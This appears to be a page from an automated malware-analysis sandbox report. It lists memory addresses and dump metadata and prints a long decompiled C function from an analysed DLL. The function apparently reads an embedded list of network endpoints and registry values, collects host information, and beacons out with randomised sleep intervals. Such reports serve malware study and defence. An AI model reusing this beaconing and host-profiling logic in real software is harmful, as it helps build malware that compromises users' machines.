0x6e7a4d96
0x6e7a4df3
0x6e7a5051
0x6e7a4df9
0x6e7a4dfb
0x6e7a4dfe
0x6e7a4e12
0x6e7a4e16
0x6e7a4e22
0x6e7a4e28
0x6e7a4e28
0x6e7a4e2d
0x6e7a4e31
0x6e7a4e37
0x00000000
0x00000000
0x6e7a4e3d
0x6e7a4e42
0x00000000
0x6e7a4e44
0x6e7a4e44
0x6e7a4e4d
0x6e7a4e5e
0x6e7a4e5e
0x00000000
0x6e7a4e4f
0x6e7a4e55
0x6e7a4e5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4e5c
0x6e7a4e4f
0x6e7a4e4d
0x00000000
0x6e7a4e42
0x6e7a5042
0x6e7a5044
0x6e7a5047
0x6e7a504a
0x6e7a4e00
0x6e7a4e02
0x6e7a4e04
0x6e7a4e07
0x6e7a4e0d
0x6e7a4e10
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4e10
0x6e7a4e07
0x6e7a4dfe
0x6e7a4e63
0x6e7a4e67
0x6e7a4e6c
0x6e7a4e6f
0x6e7a4e73
0x6e7a4e79
0x6e7a4e79
0x6e7a4e7d
0x6e7a4e7f
0x6e7a4e84
0x6e7a4e86
0x6e7a4fd1
0x6e7a4fd8
0x6e7a4fda
0x6e7a4fdd
0x6e7a4fe1
0x6e7a5018
0x6e7a4fe3
0x6e7a4fe5
0x6e7a4fe7
0x6e7a4fea
0x6e7a4fee
0x6e7a4ff0
0x6e7a4ff2
0x6e7a4ff2
0x6e7a4ff3
0x6e7a4ff8
0x6e7a4ffe
0x00000000
0x00000000
0x6e7a5000
0x6e7a5004
0x6e7a5009
0x00000000
0x00000000
0x00000000
0x6e7a5009
0x6e7a4ff2
0x6e7a4fee
0x6e7a500b
0x6e7a500b
0x6e7a500d
0x6e7a500e
0x6e7a5013
0x6e7a5013
0x00000000
0x6e7a4e96
0x6e7a4e98
0x6e7a4e9a
0x6e7a4e9e
0x6e7a4ea1
0x6e7a4eb5
0x6e7a4eb9
0x6e7a4ec5
0x6e7a4ecb
0x6e7a4ecb
0x6e7a4ed0
0x6e7a4ed4
0x6e7a4eda
0x00000000
0x00000000
0x6e7a4ee0
0x6e7a4ee5
0x00000000
0x6e7a4ee7
0x6e7a4eed
0x6e7a4efe
0x6e7a4efe
0x00000000
0x6e7a4eef
0x6e7a4ef5
0x6e7a4efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4efc
0x6e7a4eef
0x6e7a4eed
0x00000000
0x6e7a4ee5
0x6e7a5038
0x6e7a503b
0x6e7a4ea3
0x6e7a4ea5
0x6e7a4ea7
0x6e7a4eaa
0x6e7a4eb0
0x6e7a4eb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4eb3
0x6e7a4eaa
0x6e7a4ea1
0x6e7a4f03
0x6e7a4f08
0x6e7a4f0e
0x6e7a4f13
0x6e7a4f29
0x6e7a4f2d
0x6e7a4f33
0x6e7a4f3b
0x6e7a4f3b
0x6e7a4f49
0x6e7a4f4c
0x6e7a4f50
0x6e7a4f51
0x6e7a4f56
0x6e7a4f59
0x6e7a4f5d
0x6e7a4fa7
0x6e7a4f5f
0x6e7a4f61
0x6e7a4f63
0x6e7a4f66
0x6e7a4f6a
0x6e7a4f6e
0x6e7a4f71
0x6e7a4f73
0x6e7a4f73
0x6e7a4f74
0x6e7a4f79
0x6e7a4f7f
0x00000000
0x00000000
0x6e7a4f81
0x6e7a4f85
0x6e7a4f8a
0x00000000
0x00000000
0x00000000
0x6e7a4f8a
0x6e7a4f8c
0x6e7a4f8f
0x6e7a4f8f
0x6e7a4f6a
0x6e7a4f92
0x6e7a4f94
0x6e7a4f95
0x6e7a4f99
0x6e7a4f9e
0x6e7a4fa2
0x6e7a4fa2
0x6e7a4fae
0x6e7a4fb1
0x6e7a4f15
0x6e7a4f15
0x6e7a4f15
0x6e7a4fb5
0x6e7a4fb7
0x6e7a4fbd
0x6e7a4fbd
0x6e7a4fc0
0x6e7a4fc1
0x6e7a4fc5
0x00000000
0x00000000
0x6e7a4fcd
0x6e7a4fbb
0x6e7a4fbc
0x00000000
0x6e7a4fbc
0x00000000
0x6e7a4fcd
0x6e7a5032
0x6e7a5032
0x6e7a4fb5
0x6e7a4d98
0x6e7a4d9a
0x6e7a4d9c
0x6e7a4d9e
0x6e7a4da6
0x6e7a4da8
0x6e7a4dab
0x6e7a4daf
0x6e7a4de9
0x6e7a4db1
0x6e7a4db3
0x6e7a4db5
0x6e7a4db8
0x6e7a4dbc
0x6e7a4dbe
0x6e7a4dc0
0x6e7a4dc0
0x6e7a4dc1
0x6e7a4dc6
0x6e7a4dcc
0x00000000
0x00000000
0x6e7a4dce
0x6e7a4dd2
0x6e7a4dd7
0x00000000
0x00000000
0x00000000
0x6e7a4dd7
0x6e7a4dc0
0x6e7a4dbc
0x6e7a4dd9
0x6e7a4dd9
0x6e7a4ddb
0x6e7a4ddc
0x6e7a4de1
0x6e7a4de1
0x6e7a501b
0x6e7a501b
0x6e7a5022
0x6e7a5022
0x00000000

Strings

, xrefs: 6E7A4CAC

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 4b0d1ec8dd2fbdb845c71e68a4e7998c2f13a293f87dea5b209ef4cdc64fa771
Instruction ID: 48d2891e1f0ebdc8009c738c1b9e066eefb08acb9a1509afce2d5014c9c845bb
Opcode Fuzzy Hash: 4b0d1ec8dd2fbdb845c71e68a4e7998c2f13a293f87dea5b209ef4cdc64fa771
Instruction Fuzzy Hash: 57B16D359097934AE7154ABD969032B7A926FC2300F19877CCBE54B2B6FF3384439682

Uniqueness

Uniqueness Score: -1.00%

Function 6E786AD0, Relevance: .9, Instructions: 932
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E786AD0(void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				char _v120;
				char _v176;
				char _v192;
				char _v216;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				char _v340;
				char _v344;
				char _v348;
				signed int _v352;
				signed int _v360;
				short _v364;
				char _v368;
				char _v376;
				void* _v380;
				char _v404;
				char _v408;
				signed int _v420;
				char _v440;
				intOrPtr _v448;
				char _v452;
				char _v456;
				char _v464;
				char _v468;
				signed int _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v508;
				char _v512;
				char _v516;
				char _v524;
				char _v528;
				char _v532;
				void* _v540;
				char _v552;
				char _v556;
				signed int _v560;
				char _v564;
				char _v568;
				char _v572;
				void* _v576;
				char _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				void* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				signed int _v608;
				void* _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				signed int* _v628;
				signed int _v632;
				signed int _v636;
				char _v640;
				signed int _v644;
				char _v648;
				char _v652;
				signed int _v656;
				signed int _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				void* _v680;
				char _v684;
				intOrPtr* _v688;
				char _v692;
				void* _v696;
				void* _v700;
				void* _v704;
				char _v708;
				void* _v712;
				char _v720;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v824;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v948;
				void* _v956;
				signed int _t329;
				signed int _t330;
				intOrPtr _t375;
				intOrPtr* _t382;
				intOrPtr _t389;
				void* _t400;
				signed int _t416;
				signed int _t417;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t449;
				void* _t454;
				signed int _t467;
				signed int _t476;
				signed int _t478;
				void* _t497;
				signed int _t506;
				signed int _t507;
				signed int _t519;
				void* _t521;
				signed int _t529;
				signed int _t535;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed int _t561;
				signed int _t565;
				signed int _t567;
				signed int _t579;
				signed int _t591;
				signed int _t592;
				signed short* _t594;
				signed int _t600;
				void* _t602;
				intOrPtr* _t603;
				void* _t610;
				signed int _t755;
				signed int _t804;
				signed int* _t808;
				void* _t810;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int* _t855;
				signed int _t860;
				signed int _t861;
				signed int* _t862;
				signed int _t864;
				signed int _t867;
				intOrPtr _t868;
				void* _t871;
				signed int _t872;
				signed int _t874;
				signed int _t876;
				signed int _t878;

				_t874 = _t876;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t878 = (_t876 & 0xfffffff0) - 0x274;
				_v192 = __ecx;
				_v640 = __edx;
				_t867 =  *0x6e7bb000; // 0xffffffff
				_v644 = (E6E793930(__ebx, 0, __edi, _t867))[2] & 0x000000ff;
				_t855 = E6E793930(__ebx, 0, __edi, _t867);
				_t329 =  *0x6e7bb260; // 0xeba3e0
				_v636 = _t329;
				if(_t329 == 0) {
					_push(0x10);
					_t330 = E6E791030();
					_v636 = _t330;
					_t878 = _t878 + 4;
					__eflags = _v636;
					if(_v636 == 0) {
						_v636 = 0;
					} else {
						_t853 = _t330;
						 *((intOrPtr*)(_t853 + 4)) = 0;
						 *((intOrPtr*)(_t853 + 8)) = 0;
						 *((intOrPtr*)(_t853 + 0xc)) = 0;
					}
					_t808 = _v636;
					 *0x6e7bb260 = _t808;
					 *_t808 =  *0x6e7bb024 & 0x0000ffff;
					__eflags = ( *0x6e7bb02b & 0x000000ff) - 0xa;
					if(( *0x6e7bb02b & 0x000000ff) <= 0xa) {
					}
					__eflags =  *0x6e7bb02b & 0x000000ff;
					if(( *0x6e7bb02b & 0x000000ff) > 0) {
						__eflags = 0;
						_v584 = _t867;
						_t872 = 0;
						do {
							_v360 = 0;
							_t850 = _t872 + _t872 * 2;
							_v368 =  *((intOrPtr*)(0x6e7bb02c + _t850 * 2));
							_v364 =  *(0x6e7bb030 + _t850 * 2) & 0x0000ffff;
							E6E7B3100( &_v344,  &_v368, _t874,  &_v344);
							_t804 =  *0x6e7bb260; // 0xeba3e0
							_t322 = _t804 + 4; // 0x4
							E6E7A37E0(_t804 + 4, _v348,  *_t322);
							E6E7A0B10( &_v344);
							_t872 = _t872 + 1;
							__eflags = _t872 - ( *0x6e7bb02b & 0x000000ff);
						} while (_t872 < ( *0x6e7bb02b & 0x000000ff));
						_t579 =  *0x6e7bb260; // 0xeba3e0
						_t867 = _v584;
						_v636 = _t579;
					}
				}
				_t810 =  !=  ? 0x10 : _t855[3] & 0x000000ff;
				_t610 =  !=  ? 0 : 0x20;
				_t585 =  !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20;
				_t813 =  <=  ? 0 : 0x80;
				_t586 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80);
				_t587 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff;
				_t588 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 8;
				_t589 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010;
				_t590 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855;
				E6E7A06A0( &_v240, _t874, 0);
				_push(0);
				E6E7A9350( &_v304);
				E6E7AB360( &_v240);
				E6E7A0B30( &_v248, 0, _v240);
				E6E7A0B10( &_v244);
				_v120 = E6E7A6040(_v252, 0x7fffffff);
				E6E7A9710( &_v312,  &_v120, 1);
				_v652 = _v260;
				E6E7A9710( &_v320, _v652, E6E7A6040(_v260, 0x7fffffff));
				E6E7ABA80((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867, _t874);
				_push(0);
				_push( &_v260);
				E6E7A9EB0((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867);
				E6E7A1240( &_v268,  &_v260);
				E6E7A0B30( &_v280, 0x7fffffff, _v264);
				E6E7A0B10( &_v268);
				E6E7A0B10( &_v276);
				E6E7A9510( &_v328);
				_v676 = _v284;
				E6E7A9710( &_v344, _v676, E6E7A6040(_v284, 0x7fffffff));
				_v216 = E6E790B50( *_v688);
				E6E7A9710( &_v352,  &_v216, 2);
				_v248 = E6E790B60((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855);
				E6E7A9710( &_v360,  &_v248, 4);
				_v248 = _v708;
				E6E7A9710( &_v368,  &_v248, 4);
				_t822 =  &_v176;
				_v176 = _v720;
				E6E7A9710( &_v376,  &_v176, 1);
				_t886 =  *0x6e7bb264;
				if( *0x6e7bb264 == 0) {
					 *0x6e7bb264 = 1;
					E6E7A06A0(_t878 + 0xe0, _t874, 0);
					E6E7A0D40(E6E7A0D40(E6E7A0D40( &_v440, 0x2e), 0x4b), 0x42);
					E6E798810( &_v532, 0);
					E6E7996D0(E6E7996D0(E6E7996D0(E6E7996D0(_t878 + 0x90, 0x20), 0x28), 0x4b), 0x42);
					asm("movups xmm0, [0x6e7b9400]");
					_t375 =  *0x6e7b9410; // 0x13401ec1
					asm("movups [esp], xmm0");
					_v676 = _t375;
					_push(0);
					E6E7A9350( &_v568);
					_v628 = _t855;
					_t591 = 0;
					__eflags = 0;
					_v636 = _t867;
					do {
						E6E7A9670( &_v572, E6E7A9650( &_v572) + 4);
						_t868 =  *((intOrPtr*)(_t878 + _t591 * 4));
						_t382 = E6E7A9640( &_v572, E6E7A9650( &_v572) + 0xfffffffc);
						_t591 = _t591 + 1;
						 *_t382 = _t868;
						__eflags = _t591 - 5;
					} while (_t591 < 5);
					_t592 = 0;
					__eflags = 0;
					_t857 = _v592;
					_t869 = _v600;
					_v568 = 0;
					_v564 = 0;
					_v560 = 0;
					do {
						_push(0);
						E6E7AC550(_t592,  &_v556, _t869, _t874, _t878 + 0x84, 0x80000002);
						E6E7ACE00(_t592,  &_v568, _t857, _t869, _t874,  &_v340);
						E6E798810( &_v472, 0);
						E6E798810( &_v468, 0);
						__eflags = _v352;
						if(_v352 > 0) {
							_v604 = _t592;
							_t871 = 0;
							__eflags = 0;
							do {
								_t603 = E6E7A7600(_t878 + 0x150, _t871);
								_t535 = E6E7A1000(_t603);
								__eflags = _t535;
								if(_t535 == 0) {
									__eflags = E6E7A1460(_t603, _v448);
									if(__eflags == 0) {
										_push(_v560);
										_push(0);
										E6E7ABF30( &_v652, __eflags,  *_t603);
										_t857 =  &_v644;
										E6E7AC580( &_v664, _t822,  &_v644, 0xffa790dd);
										E6E7ACAE0( &_v672,  &_v644, _v652);
										E6E7A0B10( &_v644);
										E6E79F6E0( &_v652,  &_v644);
										E6E798CC0(_t878 + 0xd0, _v648);
										E6E798CA0( &_v652);
										E6E798CA0( &_v660);
										_t547 = E6E799DC0(_t878 + 0xcc);
										__eflags = _t547;
										if(_t547 != 0) {
											L70:
											E6E798CA0( &_v648);
											__eflags = _v652;
											if(_v652 != 0) {
												_t822 = _v656;
												__eflags = _t822;
												if(_t822 == 0) {
													L74:
													_t549 = 1;
												} else {
													__eflags = _t822 - 0xffffffff;
													if(_t822 == 0xffffffff) {
														goto L74;
													} else {
														_t549 = 0;
													}
												}
												__eflags = _t549;
												if(_t549 == 0) {
													E6E7ABF00(_t822);
												}
											}
											_v656 = 0;
											goto L38;
										} else {
											_t551 = E6E79A330( &_v472, _t871,  *((intOrPtr*)(_t878 + 0x8c)));
											__eflags = _t551;
											if(_t551 == 0) {
												_t857 = _t878;
												E6E7AC580( &_v660, _t822, _t878, 0x494c03d0);
												E6E7ACAE0( &_v668,  &_v640, _v684);
												E6E7A0B10(_t878);
												E6E79F6E0( &_v648,  &_v640);
												E6E798CC0( &_v484, _v644);
												E6E798CA0( &_v648);
												E6E798CA0( &_v656);
												_t561 = E6E799DC0( &_v488);
												__eflags = _t561;
												if(_t561 == 0) {
													E6E7996D0(E6E7A0220(E6E7996D0(E6E7996D0( &_v472, 0x20), 0x28), _v472, 0), 0x29);
												}
												_t822 = _v472;
												E6E797FA0( &_v668);
												E6E7A0B30(_t603, _v472, _v668);
												E6E7A0B10( &_v672);
												_push( *_t603);
												_t565 = E6E7A8820(_t603,  &_v588, _t857, _t871);
												__eflags = _t565;
												if(_t565 == 0) {
													E6E7A37E0( &_v588,  *_t603, _v588);
												}
												E6E798CA0( &_v652);
												__eflags = _v656;
												if(_v656 != 0) {
													_t822 = _v660;
													__eflags = _t822;
													if(_t822 == 0) {
														L86:
														_t567 = 1;
													} else {
														__eflags = _t822 - 0xffffffff;
														if(_t822 == 0xffffffff) {
															goto L86;
														} else {
															_t567 = 0;
														}
													}
													__eflags = _t567;
													if(_t567 == 0) {
														E6E7ABF00(_t822);
													}
												}
												_v660 = 0;
												goto L38;
											} else {
												goto L70;
											}
										}
										goto L99;
									}
								}
								L38:
								_t871 = _t871 + 1;
								__eflags = _t871 -  *((intOrPtr*)(_t878 + 0x14c));
							} while (_t871 <  *((intOrPtr*)(_t878 + 0x14c)));
							_t592 = _v604;
						}
						_t389 = _v600;
						__eflags =  *((char*)(_t389 + 0xb)) - 0x28;
						if( *((char*)(_t389 + 0xb)) < 0x28) {
							_t867 = _v608;
							E6E798CA0( &_v456);
							E6E798CA0( &_v464);
							E6E7A7560(_t878 + 0x14c, _t857, _t867);
							E6E798CA0( &_v552);
							__eflags = _v556;
							if(_v556 != 0) {
								_t849 = _v560;
								__eflags = _t849;
								if(_t849 == 0) {
									L64:
									_t519 = 1;
								} else {
									__eflags = _t849 - 0xffffffff;
									if(_t849 == 0xffffffff) {
										goto L64;
									} else {
										_t519 = 0;
									}
								}
								__eflags = _t519;
								if(_t519 == 0) {
									E6E7ABF00(_t849);
								}
							}
							_v560 = 0;
						} else {
							_t521 = E6E7A9650(_t878 + 0x7c);
							_t190 = _t521 + 4; // 0x4
							E6E7A9670(_t878 + 0x80, _t190);
							_t857 = _t521 + 0xfffffffc;
							__eflags = _t857;
							if(_t857 > 0) {
								_t869 = E6E7A9640(_t878 + 0x80, 8);
								E6E790BC0(_t531, E6E7A9640(_t878 + 0x80, 4), _t857);
								_t878 = _t878 + 0xc;
							}
							 *((intOrPtr*)(E6E7A9640(_t878 + 0x80, 4))) = 0xd2b02901;
							E6E798CA0(_t878 + 0xd4);
							E6E798CA0( &_v468);
							E6E7A7560( &_v340, _t857, _t869);
							E6E798CA0( &_v556);
							__eflags = _v560;
							if(_v560 != 0) {
								_t822 = _v560;
								__eflags = _t822;
								if(_t822 == 0) {
									L47:
									_t529 = 1;
								} else {
									__eflags = _t822 - 0xffffffff;
									if(_t822 == 0xffffffff) {
										goto L47;
									} else {
										_t529 = 0;
									}
								}
								__eflags = _t529;
								if(_t529 == 0) {
									E6E7ABF00(_t822);
								}
							}
							goto L50;
						}
						L52:
						E6E78ABE0(_t878 + 0x94, 0);
						E6E7983B0( &_v512);
						E6E7A6EC0(_t878 + 0x9c, _v512, 0);
						E6E7A0B10(_t878 + 0x9c);
						_t400 = E6E7A37E0(E6E7A88F0( &_v584), _v528,  *_t399);
						_t858 = _t878 + 0xa4;
						E6E7A7FC0(_t400, _t878 + 0xa4, 0x3b);
						_v452 = E6E790B60(E6E7A6040(_v528, 0x7fffffff));
						E6E7A9710( &_v348,  &_v452, 4);
						E6E7A9710(_t878 + 0x160,  *((intOrPtr*)(_t878 + 0xa4)), E6E7A6040( *((intOrPtr*)(_t878 + 0xa4)), 0x7fffffff));
						E6E7A0B10(_t878 + 0xa4);
						E6E7A0B10( &_v560);
						E6E7A7560( &_v616, _t878 + 0xa4, _t867);
						E6E7A06A0(_t878 + 0xb0, _t874, 0);
						E6E7A06A0( &_v532, _t874, 0);
						E6E7A06A0( &_v528, _t874, 0);
						_push(0);
						E6E7A9350( &_v644);
						 *((intOrPtr*)(_t878 + 0xe4)) = 0;
						 *((intOrPtr*)(_t878 + 0xe8)) = 0;
						_v488 = 0;
						_t416 = E6E7915C0(0xa1310f65, 0xf95c938e);
						__eflags = _t416;
						if(_t416 == 0) {
							_t594 = 0;
							__eflags = 0;
							_t417 =  *0x00000000 & 0x0000ffff;
							__eflags = _t417;
							while(_t417 != 0) {
								__eflags = _t417 - 0x3d;
								if(_t417 != 0x3d) {
									E6E7983B0( &_v404);
									E6E7A37E0(_t878 + 0xec, _v404,  *((intOrPtr*)(_t878 + 0xe4)));
									E6E7A0B10(_t878 + 0x10c);
								}
								_t594 = _t594 + 2 + E6E7A0180(_t594, 0x7fffffff, _t867) * 2;
								_t417 =  *_t594 & 0x0000ffff;
								__eflags = _t417;
							}
							E6E7A7FC0(E6E7A88F0(E6E7A3EC0(_t878 + 0xe4)),  &_v476, 0xa);
							E6E7A6EC0( &_v508, _v484, 0);
							E6E7A0B10( &_v476);
							E6E7A7560(_t878 + 0xe4, _t858, _t867);
							_v440 = E6E790B60(E6E7A6040(_v516, 0x7fffffff));
							E6E7A9710( &_v344,  &_v440, 4);
							E6E7A9710( &_v352, _v524, E6E7A6040(_v524, 0x7fffffff));
							E6E7A9510( &_v628);
							E6E7A0B10( &_v516);
							E6E7A0B10( &_v524);
							E6E7A0B10( &_v532);
							E6E7A9510( &_v580);
							E6E798CA0( &_v564);
							E6E7A0B10( &_v484);
							goto L2;
						} else {
							asm("int3");
							return _t416;
						}
						goto L99;
						L50:
						_t592 = _t592 + 1;
						_v560 = 0;
						__eflags = _t592 - 2;
					} while (_t592 < 2);
					_t867 = _v608;
					goto L52;
				} else {
					L2:
					E6E78ABE0( &_v260, 2);
					E6E7A1EB0( &_v260, _t886,  &_v244, 0x3b);
					E6E7A0B10( &_v268);
					_push(E6E7A9650(_t878 + 0x158));
					E6E7A9350( &_v304);
					_v620 =  *((intOrPtr*)(_t878 + 0x1ac));
					_v624 = E6E7A6040( *((intOrPtr*)(_t878 + 0x1ac)), 0x7fffffff);
					_t444 = E6E7A9640( &_v340, 0);
					_t445 = E6E7A9650( &_v344);
					_t446 = E6E7A9640( &_v312, 0);
					_push(0);
					_push(0);
					_push(_t446);
					_push(_t445);
					_push(_t444);
					_t832 = _v632;
					E6E7AE5D0(_v628, _v632, _t867);
					_t449 = E6E7AA190(_t878 + 0x178);
					_push(0);
					E6E7A9350(_t878 + 0x1e4);
					_v244 = E6E790B60(_t449);
					E6E7A9710(_t878 + 0x1ec,  &_v244, 4);
					_t454 = E6E7A9640( &_v348, 0);
					E6E7A9710( &_v244, _t454, E6E7A9650( &_v352));
					E6E7A9510( &_v360);
					E6E7A0B10(_t878 + 0x1ac);
					E6E7A9510(_t878 + 0x158);
					E6E7A0B10(_t878 + 0x194);
					_push(0);
					E6E7A9350(_t878 + 0x1f8);
					_push(0);
					E6E7A9350( *((intOrPtr*)(_t878 + 0x1c8)));
					_t860 =  *0x6e7bb260; // 0xeba3e0
					if(_t860 == 0) {
						_push(0x10);
						_t861 = E6E791030();
						_t878 = _t878 + 4;
						__eflags = _t861;
						if(_t861 == 0) {
							_t861 = 0;
							__eflags = 0;
						} else {
							 *(_t861 + 4) = 0;
							 *((intOrPtr*)(_t861 + 8)) = 0;
							 *((intOrPtr*)(_t861 + 0xc)) = 0;
						}
						 *_t861 =  *0x6e7bb024 & 0x0000ffff;
						_t832 =  *0x6e7bb02b & 0x000000ff;
						 *0x6e7bb260 = _t861;
						__eflags = ( *0x6e7bb02b & 0x000000ff) - 0xa;
						if(( *0x6e7bb02b & 0x000000ff) <= 0xa) {
						}
						__eflags =  *0x6e7bb02b & 0x000000ff;
						if(( *0x6e7bb02b & 0x000000ff) > 0) {
							_t864 = 0;
							__eflags = 0;
							_t602 = _t878 + 0x134;
							do {
								 *(_t878 + 0x128) = 0;
								_t507 = _t864 + _t864 * 2;
								_t832 =  *(0x6e7bb02c + _t507 * 2);
								_v420 =  *(0x6e7bb02c + _t507 * 2);
								 *((short*)(_t878 + 0x124)) =  *(0x6e7bb030 + _t507 * 2) & 0x0000ffff;
								E6E7B3100(_t602,  &_v420, _t874, _t602);
								_t755 =  *0x6e7bb260; // 0xeba3e0
								_t157 = _t755 + 4; // 0x4
								E6E7A37E0(_t755 + 4, _v404,  *_t157);
								E6E7A0B10(_t602);
								_t864 = _t864 + 1;
								__eflags = _t864 - ( *0x6e7bb02b & 0x000000ff);
							} while (_t864 < ( *0x6e7bb02b & 0x000000ff));
							_t861 =  *0x6e7bb260; // 0xeba3e0
						}
					}
					_t862 = _t861 + 4;
					E6E7922A0(0x3e8, _t832);
					_t600 = 0;
					_t888 = _t867 - 0xffffffff;
					if(_t867 == 0xffffffff) {
						L11:
						_t467 = _t600;
						asm("cdq");
						_t833 = _t467 %  *_t862;
						_t867 = _t467 %  *_t862;
					}
					E6E7B31A0(_t600, _t878 + 0x224, _t862);
					 *(_t878 + 0x23c) = 1;
					 *((intOrPtr*)(_t878 + 0x264)) = 0x12c;
					if(E6E7B3370(_t600, _t878 + 0x228, _t862, _t867, _t888, E6E7A7600(_t862, _t867)) == 0) {
						L5:
						E6E7B3260(_t878 + 0x224, _t833, _t867);
						_t600 = _t600 + 1;
						_t888 = _t600;
						if(_t600 != 0) {
							_t476 = _t600;
							asm("cdq");
							__eflags = _t476 %  *_t862;
							if(_t476 %  *_t862 != 0) {
								_t837 = 0xb4;
								_t478 = E6E7AE170(0x78, 0xb4);
							} else {
								_t837 = 0x168;
								_t478 = E6E7AE170(0xf0, 0x168);
							}
							__eflags = _t478 * 0x3e8;
							E6E7922A0(_t478 * 0x3e8, _t837);
						} else {
							E6E7922A0(0x3e8, _t833);
						}
						goto L11;
					}
					E6E7B3820(_t878 + 0x22c,  &_v192, _t878 + 0x1e4);
					_t833 = _t878 + 0x204;
					_push(_t878 + 0x204);
					E6E7A9520( &_v216);
					E6E7A9510(_t878 + 0x204);
					__eflags =  *(_t878 + 0x224);
					if( *(_t878 + 0x224) != 0) {
						goto L5;
					}
					_t833 =  *(_t878 + 0x258);
					__eflags = _t833 - 0xc8;
					if(_t833 != 0xc8) {
						__eflags = _t833 - 0x194;
						if(_t833 != 0x194) {
							goto L5;
						}
					}
					_t838 = _a4 & 0x000000ff;
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						_push(0);
						E6E7A9350( &_v276);
						 *((intOrPtr*)(_t878 + 0x1cc)) = E6E790B60(E6E7A9A90( &_v216, _t867));
						__eflags = E6E7AA190( &_v216) -  *((intOrPtr*)(_t878 + 0x1cc));
						if(__eflags == 0) {
							E6E78ABE0(_t878 + 0x13c, 2);
							E6E7A1EB0(_t878 + 0x144, __eflags, _t878 + 0x144, 0x3b);
							E6E7A0B10( &_v408);
							_push(E6E7A9650(_t878 + 0x1f4));
							E6E7A9350( &_v472);
							 *((intOrPtr*)(_t878 + 0x188)) = _v404;
							_v484 = E6E7A6040(_v404, 0x7fffffff);
							 *((intOrPtr*)(_t878 + 0x190)) = E6E7A9640(_t878 + 0x1f8, 0);
							 *((intOrPtr*)(_t878 + 0x18c)) = E6E7A9650(_t878 + 0x1f4);
							_t497 = E6E7A9640( &_v480, 0);
							_push(0);
							_push(0);
							_push(_t497);
							_push(_v340);
							_push( *((intOrPtr*)(_t878 + 0x1a0)));
							E6E7AE5D0(_v344,  *((intOrPtr*)(_t878 + 0x108)), _t867);
							_push(_t878 + 0xfc);
							E6E7A9520( &_v320);
							E6E7A9510( &_v508);
							__eflags = _a8 & 0x000000ff;
							if((_a8 & 0x000000ff) != 0) {
								E6E7A9850(_t878 + 0x1bc,  &_v684, 0x80);
								E6E7A9510( &_v692);
							}
							E6E7A0B10( &_v420);
						}
						_t833 = _t878 + 0x1b4;
						_push(_t878 + 0x1b4);
						E6E7A9520( *((intOrPtr*)(_t878 + 0x1c4)));
						E6E7A9510( &_v312);
						_t506 = E6E7A9660( *((intOrPtr*)(_t878 + 0x1c4)));
						__eflags = _t506;
						if(_t506 != 0) {
							goto L5;
						}
					}
					E6E7B3260(_t878 + 0x224, _t838, _t867);
					E6E7A9510(_t878 + 0x1f4);
					E6E7A9510(_t878 + 0x1e4);
					 *0x6e7bb000 = _t867;
					return _v260;
				}
				L99:
			}

0x6e786ad1
0x6e786ad6
0x6e786ad7
0x6e786ad8
0x6e786ad9
0x6e786adf
0x6e786ae8
0x6e786aec
0x6e786afd
0x6e786b05
0x6e786b07
0x6e786b0c
0x6e786b12
0x6e787967
0x6e787969
